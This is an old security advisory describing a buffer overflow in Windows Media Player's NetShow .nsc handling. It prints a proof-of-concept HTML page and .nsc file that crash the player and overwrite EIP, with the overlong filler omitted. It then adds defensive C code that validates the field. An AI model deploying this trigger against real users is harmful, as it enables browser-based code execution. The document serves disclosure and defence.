Vulnerability
Media Player
Affected
Microsoft Windows Media Player
Description
Pauli Ojanpera found the following. The same old story again, this
time with Netshow multicast redirector files. Check out the
code below. Open ipaddr.html and your EIP gets busted
(beware: IE crashes too, so your windows get lost).
There are a whole lot of these in dxmasf.dll. This is just too
fun to post them one at a time. Many more known right now.
IPADDR.HTML:
<HTML>
<BODY>
<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95
type="application/x-oleobject">
<PARAM NAME="Filename" VALUE="ipaddr.nsc">
</OBJECT>
</BODY>
</HTML>
IPADDR.NSC:
[Address]
IP Address=[overlong filler string omitted]
Solution
Nothing yet.
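The crash above comes from an overlong "IP Address" value in the .nsc file. The advisory does not show the parsing code in dxmasf.dll, so the following is an added example (not from the advisory or from Microsoft) of a reader for that field that checks length and format before copying. The function names, the 15-character cap and the assumption that the value is a dotted-quad IPv4 address are illustrative.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NSC_IP_MAX 15  /* assumption: longest dotted quad, "255.255.255.255" */

/* Returns 1 if s[0..len) is a dotted-quad IPv4 address, else 0. */
static int is_dotted_quad(const char *s, size_t len) {
    int parts = 0, digits = 0, val = 0;
    if (len == 0 || len > NSC_IP_MAX) return 0;
    for (size_t i = 0; i <= len; i++) {
        if (i < len && isdigit((unsigned char)s[i])) {
            val = val * 10 + (s[i] - '0');
            if (++digits > 3 || val > 255) return 0;
        } else if (i == len || s[i] == '.') {   /* end of one octet */
            if (digits == 0) return 0;
            parts++; digits = 0; val = 0;
        } else return 0;                        /* any other byte: reject */
    }
    return parts == 4;
}

/* Copies the "IP Address" value from NSC text into out (outlen bytes).
 * Returns 0 on success, -1 if the key is missing, malformed or too long.
 * The length is checked before any byte is copied. */
int nsc_read_ip(const char *text, char *out, size_t outlen) {
    static const char key[] = "IP Address=";
    const char *line = text;
    while (line && *line) {
        if (strncmp(line, key, sizeof key - 1) == 0) {
            const char *val = line + sizeof key - 1;
            size_t len = strcspn(val, "\r\n");
            if (len >= outlen || !is_dotted_quad(val, len)) return -1;
            memcpy(out, val, len);
            out[len] = '\0';
            return 0;
        }
        line = strchr(line, '\n');              /* advance to next line */
        if (line) line++;
    }
    return -1;
}

int main(void) {
    char ip[NSC_IP_MAX + 1];  /* input below is a constructed sample */
    int rc = nsc_read_ip("[Address]\nIP Address=239.1.2.3\n", ip, sizeof ip);
    printf("%s\n", rc == 0 ? ip : "rejected");
    return 0;
}
```

The same check can run in a mail or web content filter to reject .nsc files before they reach the player.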
Credits
-- UnKnown --